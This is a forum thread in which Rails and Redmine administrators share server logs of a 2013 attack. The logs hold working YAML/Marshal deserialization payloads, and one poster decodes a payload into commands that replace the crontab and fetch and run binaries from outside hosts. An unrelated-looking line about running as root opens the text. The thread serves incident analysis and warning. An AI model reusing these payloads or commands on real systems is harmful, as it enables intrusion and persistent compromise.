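Run as root so every /proc/<pid>/exe link is readable; a non-root run silently skips other users' processes, which is exactly where the bot lives when it was dropped through the web application's account.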

Hi,

OK, that's why I asked whether one of you has a Redmine, because I found interesting logs.

I think he uses "/login?back_url=".

nginx/access.log (my Redmine)

17510: 88.198.20.247 - - [24/May/2013:15:17:34 +0200] "HEAD / HTTP/1.1" 302 0 "-" "-" "-"
.....
17584: 88.198.20.247 - - [24/May/2013:17:24:16 +0200] "POST / HTTP/1.1" 302 1256 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
17585: 88.198.20.247 - - [24/May/2013:17:24:16 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3Fid%3D%250A---%250A%2521ruby%252Fobject%253AGem%253A%253ARequirement%250Arequirements%253A%250A%2B%2B-%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253AAbstract%253A%253ASessionHash%250A%2B%2B%2B%2B%2B%2Benv%253A%250A%2B%2B%2B%2B%2B%2B%2B%2BHTTP_COOKIE%253A%2B%2522a%253DBAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgY6CUBzcmNJIgHXc3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQoGOgZFVDoMQG1ldGhvZDoLcmVzdWx0%2522%250A%2B%2B%2B%2B%2B%2Bby%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%250A%2B%2B%2B%2B%2B%2B%2B%2Bcoder%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%253A%253ABase64%253A%253AMarshal%2B%257B%257D%250A%2B%2B%2B%2B%2B%2B%2B%2Bkey%253A%2Ba%250A%2B%2B%2B%2B%2B%2B%2B%2Bsecrets%253A%2B%255B%255D%250A%2B%2B%2B%2B%2B%2Bexists%253A%2Btrue%250A HTTP/1.1" 200 4006 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17586: 88.198.20.247 - - [24/May/2013:17:24:17 +0200] "POST / HTTP/1.1" 302 778 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17587: 88.198.20.247 - - [24/May/2013:17:24:17 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3FmdalXTOJwb%3D---%2B%2521ruby%252Fhash%253AActionDispatch%253A%253ARouting%253A%253ARouteSet%253A%253ANamedRouteCollection%250A%2527LR%253B%2Beval%2528%2525%255Bc3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQ%253D%253D%255D.unpack%2528%2525%255Bm0%255D%2529%255B0%255D%2529%253B%2527%2B%253A%2B%2521ruby%252Fobject%253AOpenStruct%250A%2Btable%253A%250A%2B%2B%253Adefaults%253A%2B%257B%257D%250A HTTP/1.1" 200 3669 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17588: 88.198.20.247 - - [24/May/2013:17:24:17 +0200] "POST / HTTP/1.1" 302 904 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17589: 88.198.20.247 - - [24/May/2013:17:24:17 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3FkFsacuPKMjhdHgm%3D---%2B%2521ruby%252Fhash%253AActionController%253A%253ARouting%253A%253ARouteSet%253A%253ANamedRouteCollection%250A%2527BJmW%253B%2Beval%2528%2525%255Bc3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQ%253D%253D%255D.unpack%2528%2525%255Bm0%255D%2529%255B0%255D%2529%253B%2527%2B%253A%2B%2521ruby%252Fobject%253AActionController%253A%253ARouting%253A%253ARoute%250A%2Bsegments%253A%2B%255B%255D%250A%2Brequirements%253A%250A%2B%2B%2B%253AFXX%253A%250A%2B%2B%2B%2B%2B%253AxxqntMoR%253A%2B%253ANLOFpSw%250A HTTP/1.1" 200 3760 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17590  89.100.221.85 - - [24/May/2013:18:13:47 +0200] "GET / HTTP/1.1" 304 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22" "-"
 17591  89.100.221.85 - - [24/May/2013:18:14:00 +0200] "-" 400 0 "-" "-" "-"
 .....
 17628  89.100.221.85 - - [24/May/2013:20:39:12 +0200] "-" 400 0 "-" "-" "-"
 17629: 88.198.20.247 - - [24/May/2013:21:14:04 +0200] "POST / HTTP/1.1" 302 1200 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17630: 88.198.20.247 - - [24/May/2013:21:14:04 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3Fid%3D%250A---%250A%2521ruby%252Fobject%253AGem%253A%253ARequirement%250Arequirements%253A%250A%2B%2B-%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253AAbstract%253A%253ASessionHash%250A%2B%2B%2B%2B%2B%2Benv%253A%250A%2B%2B%2B%2B%2B%2B%2B%2BHTTP_COOKIE%253A%2B%2522a%253DBAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgY6CUBzcmNJIgGpc3lzdGVtKCd3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycpCgY6BkVUOgxAbWV0aG9kOgtyZXN1bHQ%253D%2522%250A%2B%2B%2B%2B%2B%2Bby%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%250A%2B%2B%2B%2B%2B%2B%2B%2Bcoder%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%253A%253ABase64%253A%253AMarshal%2B%257B%257D%250A%2B%2B%2B%2B%2B%2B%2B%2Bkey%253A%2Ba%250A%2B%2B%2B%2B%2B%2B%2B%2Bsecrets%253A%2B%255B%255D%250A%2B%2B%2B%2B%2B%2Bexists%253A%2Btrue%250A HTTP/1.1" 200 3948 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17631: 88.198.20.247 - - [24/May/2013:21:14:05 +0200] "POST / HTTP/1.1" 302 706 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17632: 88.198.20.247 - - [24/May/2013:21:14:05 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3FmdalXTOJwb%3D---%2B%2521ruby%252Fhash%253AActionDispatch%253A%253ARouting%253A%253ARouteSet%253A%253ANamedRouteCollection%250A%2527LR%253B%2Beval%2528%2525%255Bc3lzdGVtKCd3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp%255D.unpack%2528%2525%255Bm0%255D%2529%255B0%255D%2529%253B%2527%2B%253A%2B%2521ruby%252Fobject%253AOpenStruct%250A%2Btable%253A%250A%2B%2B%253Adefaults%253A%2B%257B%257D%250A HTTP/1.1" 200 3601 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17633: 88.198.20.247 - - [24/May/2013:21:14:05 +0200] "POST / HTTP/1.1" 302 832 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17634: 88.198.20.247 - - [24/May/2013:21:14:05 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3FkFsacuPKMjhdHgm%3D---%2B%2521ruby%252Fhash%253AActionController%253A%253ARouting%253A%253ARouteSet%253A%253ANamedRouteCollection%250A%2527BJmW%253B%2Beval%2528%2525%255Bc3lzdGVtKCd3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp%255D.unpack%2528%2525%255Bm0%255D%2529%255B0%255D%2529%253B%2527%2B%253A%2B%2521ruby%252Fobject%253AActionController%253A%253ARouting%253A%253ARoute%250A%2Bsegments%253A%2B%255B%255D%250A%2Brequirements%253A%250A%2B%2B%2B%253AFXX%253A%250A%2B%2B%2B%2B%2B%253AxxqntMoR%253A%2B%253ANLOFpSw%250A HTTP/1.1" 200 3691 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17635  89.100.221.85 - - [24/May/2013:21:40:43 +0200] "-" 400 0 "-" "-" "-"
 17636  89.100.221.85 - - [24/May/2013:21:44:10 +0200] "GET / HTTP/1.1" 304 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22" "-"
 .....
 17836: 88.198.20.247 - - [24/May/2013:23:10:01 +0200] "POST / HTTP/1.1" 302 1396 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22" "-"
 17837: 88.198.20.247 - - [24/May/2013:23:10:02 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3Fid%3D%250A---%250A%2521ruby%252Fobject%253AGem%253A%253ARequirement%250Arequirements%253A%250A%2B%2B-%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253AAbstract%253A%253ASessionHash%250A%2B%2B%2B%2B%2B%2Benv%253A%250A%2B%2B%2B%2B%2B%2B%2B%2BHTTP_COOKIE%253A%2B%2522a%253DBAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgY6CUBzcmNJIgI3AXN5c3RlbSgnY3JvbnRhYiAtcjsgZWNobyAiMSAqICogKiAqIHdnZXQgLU8gLSBjb2xrb2xkdWxkLmNvbS9jbWQxfGJhc2g7d2dldCAtTyAtIGxvY2hqb2wuY29tL2NtZDJ8YmFzaDt3Z2V0ICAtTyAtIGRkb3MuY2F0LmNvbS9jbWQzfGJhc2g7Inxjcm9udGFiIC07d2dldCBodHRwOi8vODguMTk4LjIwLjI0Ny9rLmMgLU8gL3RtcC9rLmM7IGdjYyAtbyAvdG1wL2sgL3RtcC9rLmM7IGNobW9kICt4IC90bXAvazsgL3RtcC9rfHx3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2sgLU8gL3RtcC9rICYmIGNobW9kICt4IC90bXAvayAmJiAvdG1wL2snKQoKBjoGRVQ6DEBtZXRob2Q6C3Jlc3VsdA%253D%253D%2522%250A%2B%2B%2B%2B%2B%2Bby%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%250A%2B%2B%2B%2B%2B%2B%2B%2Bcoder%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%253A%253ABase64%253A%253AMarshal%2B%257B%257D%250A%2B%2B%2B%2B%2B%2B%2B%2Bkey%253A%2Ba%250A%2B%2B%2B%2B%2B%2B%2B%2Bsecrets%253A%2B%255B%255D%250A%2B%2B%2B%2B%2B%2Bexists%253A%2Btrue%250A HTTP/1.1" 200 4142 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22" "-"
 17838: 88.198.20.247 - - [24/May/2013:23:10:03 +0200] "POST / HTTP/1.1" 302 894 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22" "-"
 17839: 88.198.20.247 - - [24/May/2013:23:10:03 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3FmdalXTOJwb%3D---%2B%2521ruby%252Fhash%253AActionDispatch%253A%253ARouting%253A%253ARouteSet%253A%253ANamedRouteCollection%250A%2527LR%253B%2Beval%2528%2525%255Bc3lzdGVtKCdjcm9udGFiIC1yOyBlY2hvICIxICogKiAqICogd2dldCAtTyAtIGNvbGtvbGR1bGQuY29tL2NtZDF8YmFzaDt3Z2V0IC1PIC0gbG9jaGpvbC5jb20vY21kMnxiYXNoO3dnZXQgIC1PIC0gZGRvcy5jYXQuY29tL2NtZDN8YmFzaDsifGNyb250YWIgLTt3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp%255D.unpack%2528%2525%255Bm0%255D%2529%255B0%255D%2529%253B%2527%2B%253A%2B%2521ruby%252Fobject%253AOpenStruct%250A%2Btable%253A%250A%2B%2B%253Adefaults%253A%2B%257B%257D%250A HTTP/1.1" 200 3790 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22" "-"
 17840: 88.198.20.247 - - [24/May/2013:23:10:03 +0200] "POST / HTTP/1.1" 302 1020 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22" "-"
 17841: 88.198.20.247 - - [24/May/2013:23:10:04 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3FkFsacuPKMjhdHgm%3D---%2B%2521ruby%252Fhash%253AActionController%253A%253ARouting%253A%253ARouteSet%253A%253ANamedRouteCollection%250A%2527BJmW%253B%2Beval%2528%2525%255Bc3lzdGVtKCdjcm9udGFiIC1yOyBlY2hvICIxICogKiAqICogd2dldCAtTyAtIGNvbGtvbGR1bGQuY29tL2NtZDF8YmFzaDt3Z2V0IC1PIC0gbG9jaGpvbC5jb20vY21kMnxiYXNoO3dnZXQgIC1PIC0gZGRvcy5jYXQuY29tL2NtZDN8YmFzaDsifGNyb250YWIgLTt3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp%255D.unpack%2528%2525%255Bm0%255D%2529%255B0%255D%2529%253B%2527%2B%253A%2B%2521ruby%252Fobject%253AActionController%253A%253ARouting%253A%253ARoute%250A%2Bsegments%253A%2B%255B%255D%250A%2Brequirements%253A%250A%2B%2B%2B%253AFXX%253A%250A%2B%2B%2B%2B%2B%253AxxqntMoR%253A%2B%253ANLOFpSw%250A HTTP/1.1" 200 3880 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22" "-"
 17842  80.108.82.117 - - [25/May/2013:00:01:49 +0200] "f\xA9\xA4\xFAo\x7F\xD0\xD6\xCB\x05\x83T\x82\xE7\x18\xDF\xD9p\x94\x80\xA6FY89g;\xDA}\xFDE9A\xF1P|\xBB\xF1\xA9\xFD\xE0\xDB\xCC_\x9A\x9C1\x89t\xADj\x10\xED\x9B\xF4\x8E*\xB8\x941\xF5+\x0B.&\xC5\x97,Q\xB8\x04\x85" 400 166 "-" "-" "-"

Here (I don't know how...) he compiled the C program (for me "k.c" & "sh.py").
And he tries to access my root account.

nginx/error.log

 1848  /home/my_login/.rvm/gems/ruby-1.9.3-p327/gems/activesupport-3.2.9/lib/active_support/dependencies.rb:251:in `block in require': iconv will be deprecated in the future, use String#encode instead.
 1849: --2013-05-24 21:14:01--  http://88.198.20.247/k.c
 1850: Connecting to 88.198.20.247:80... connected.
 1851  HTTP request sent, awaiting response... 200 OK
 1852  Length: 18854 (18K) [text/x-csrc]
 ....
 1858  
 1859  /tmp/k.c:91:6: warning: conflicting types for built-in function 'pow' [enabled by default]
 1860: Lockfile found. Exiting.--2013-05-24 21:14:04--  http://88.198.20.247/k.c
 1861: Connecting to 88.198.20.247:80... connected.
 1862  HTTP request sent, awaiting response... 200 OK
 1863  Length: 18854 (18K) [text/x-csrc]
 ....
 1878  [ pid=856 thr=3065412416 file=ext/nginx/HelperAgent.cpp:923 time=2013-05-24 21:49:42.117 ]: Couldn't forward the HTTP response back to the HTTP client: It seems the user clicked on the 'Stop' button in his browser.
 1879  [ pid=856 thr=3066215232 file=ext/nginx/HelperAgent.cpp:923 time=2013-05-24 21:50:29.5 ]: Couldn't forward the HTTP response back to the HTTP client: It seems the user clicked on the 'Stop' button in his browser.
 1880: --2013-05-24 23:10:00--  http://88.198.20.247/k.c
 1881: Connecting to 88.198.20.247:80... connected.
 1882  HTTP request sent, awaiting response... 200 OK
 1883  Length: 18854 (18K) [text/x-csrc]
 ....
 1889  
 1890  /tmp/k.c:91:6: warning: conflicting types for built-in function 'pow' [enabled by default]
 1891: Lockfile found. Exiting.--2013-05-24 23:10:02--  http://88.198.20.247/k.c
 1892: Connecting to 88.198.20.247:80... connected.
 1893  HTTP request sent, awaiting response... 200 OK
 1894  Length: 18854 (18K) [text/x-csrc]

 1906  HTTP request sent, awaiting response... 200 OK
 1907  Length: 2252 (2.2K) [text/plain]
 1908: Saving to: `/tmp/sh.py'
 1909  
 1910       0K ..                                                    100% 7.73M=0s
 1911  
 1912: 2013-05-25 00:36:30 (7.73 MB/s) - `/tmp/sh.py' saved [2252/2252]
 1913  
 1914  sudo: no tty present and no askpass program specified

2013-05-24 23:10:02 (218 KB/s) - `/tmp/k.c' saved [18854/18854]

/tmp/k.c:91:6: warning: conflicting types for built-in function 'pow' [enabled by default]
Lockfile found. Exiting.Lockfile found. Exiting.sh: 1: Syntax error: "(" unexpected
--2013-05-25 00:36:29--  http://starfall.cu.cc/chips.txt
Resolving starfall.cu.cc (starfall.cu.cc)... 37.221.166.32
Connecting to starfall.cu.cc (starfall.cu.cc)|37.221.166.32|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2252 (2.2K) [text/plain]
Saving to: `/tmp/sh.py'

     0K ..                                                    100% 7.73M=0s

2013-05-25 00:36:30 (7.73 MB/s) - `/tmp/sh.py' saved [2252/2252]

sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: 3 incorrect password attempts
sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: 3 incorrect password attempts
telnet: Unable to connect to remote host: Connection refused
telnet: Unable to connect to remote host: Connection refused
Connection closed by foreign host.
telnet: Unable to connect to remote host: Connection refused
Connection closed by foreign host.
Connection closed by foreign host.
Connection closed by foreign host.
/home/remy/.rvm/gems/ruby-1.9.3-p327/gems/activesupport-3.2.9/lib/active_support/dependencies.rb:251:in `block in require': iconv will be deprecated in the future, use String#encode instead.

I saw the "k.c" and I have the impression he uses an IRC server... in "cvv4you.ru" & "188.190.124.120" -> channel '#rails'
He runs the program with the fake name "- bash"; I saw that in the process list with htop.

I think we have to warn all RoR developers...

Hi Remy,

Thanks for posting your log, because I found something really interesting in the GET /login?back_url= request that you pointed out:

The 'back_url' is URL-encoded twice:

$ irb
1.9.3p392 :002 > s = '/login?back_url=http%3A%2F%2F82.239.203.55%2F%3Fid%3D%250A---%250A%2521ruby%252Fobject%253AGem%253A%253ARequirement%250Arequirements%253A%250A%2B%2B-%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253AAbstract%253A%253ASessionHash%250A%2B%2B%2B%2B%2B%2Benv%253A%250A%2B%2B%2B%2B%2B%2B%2B%2BHTTP_COOKIE%253A%2B%2522a%253DBAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgY6CUBzcmNJIgHXc3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQoGOgZFVDoMQG1ldGhvZDoLcmVzdWx0%2522%250A%2B%2B%2B%2B%2B%2Bby%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%250A%2B%2B%2B%2B%2B%2B%2B%2Bcoder%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%253A%253ABase64%253A%253AMarshal%2B%257B%257D%250A%2B%2B%2B%2B%2B%2B%2B%2Bkey%253A%2Ba%250A%2B%2B%2B%2B%2B%2B%2B%2Bsecrets%253A%2B%255B%255D%250A%2B%2B%2B%2B%2B%2Bexists%253A%2Btrue%250A'

1.9.3p392 :003 > CGI.unescape s
=> "/login?back_url=http://82.239.203.55/?id=%0A---%0A%21ruby%2Fobject%3AGem%3A%3ARequirement%0Arequirements%3A%0A++-+%21ruby%2Fobject%3ARack%3A%3ASession%3A%3AAbstract%3A%3ASessionHash%0A++++++env%3A%0A++++++++HTTP_COOKIE%3A+%22a%3DBAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgY6CUBzcmNJIgHXc3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQoGOgZFVDoMQG1ldGhvZDoLcmVzdWx0%22%0A++++++by%3A+%21ruby%2Fobject%3ARack%3A%3ASession%3A%3ACookie%0A++++++++coder%3A+%21ruby%2Fobject%3ARack%3A%3ASession%3A%3ACookie%3A%3ABase64%3A%3AMarshal+%7B%7D%0A++++++++key%3A+a%0A++++++++secrets%3A+%5B%5D%0A++++++exists%3A+true%0A"

1.9.3p392 :004 > CGI.unescape CGI.unescape s
=> "/login?back_url=http://82.239.203.55/?id=\n---\n!ruby/object:Gem::Requirement\nrequirements:\n - !ruby/object:Rack::Session::Abstract::SessionHash\n env:\n HTTP_COOKIE: "a=BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgY6CUBzcmNJIgHXc3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQoGOgZFVDoMQG1ldGhvZDoLcmVzdWx0"\n by: !ruby/object:Rack::Session::Cookie\n coder: !ruby/object:Rack::Session::Cookie::Base64::Marshal {}\n key: a\n secrets: []\n exists: true\n"

Then the 'HTTP_COOKIE' is a base64 blob:

$ base64 -d <(echo BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgY6CUBzcmNJIgHXc3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQoGOgZFVDoMQG1ldGhvZDoLcmVzdWx0)
o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy:@instanceoERB: @srcI"�system('crontab -r')
system('(crontab -l ; echo "1 * * * * wget -O /var/tmp/k colkolduld.com/req/work.php && chmod +x /var/tmp/k && /var/tmp/k") | crontab -')
system('wget -O /dev/null 188.190.124.120/req/log.php')
:ET:
@method:
resu

And so we can see that with this specially crafted request, the bad guy is able to run Ruby code which erases the user-level crontab, replacing it with his own.

I don't know exactly how it works; it might be related to the Rack security issue disclosed earlier this year (or perhaps an undisclosed vulnerability...).

Thanks again for the log!

Regards.

Hello,

It's a pleasure, as we now know what it is about. :)

Regards

In my case it was PhpMyAdmin. 92.37.71.185 started probing my server starting about 10 hours ago.

My version is 2.2.
No, I wasn't checking that before, I should have... :/
I still filed a ticket on redmine.org (http://www.redmine.org/issues/14152).

@Leglaw: What is your PhpMyAdmin version?

2.2.x?
2.2.3 has a Ruby on Rails vulnerability.

As for me, I am on Rails 3.2.8 with a custom application.

I have spotted 3 IPs which were sending malicious requests to one of our servers:
88.198.20.247
95.138.186.181
188.190.126.105

The malicious requests are messing with YAML parameters and the session cookie.
Here are some extracts of the log with malicious requests:

from 88.198.20.247:

Started GET "/" for 88.198.20.247 at 2013-05-24 12:50:17 +0000
Processing by PagesController#show as HTML
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (0.5ms)
Rendered layouts/_head.html.erb (3.8ms)
Rendered layouts/_social_links.html.erb (1.5ms)
Rendered layouts/_messages.html.haml (0.3ms)
Rendered layouts/_header.html.erb (0.9ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (2.4ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 15:05:14 +0000
Processing by PagesController#show as /
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (0.9ms)
Rendered layouts/_head.html.erb (6.4ms)
Rendered layouts/_social_links.html.erb (2.8ms)
Rendered layouts/_messages.html.haml (3.6ms)
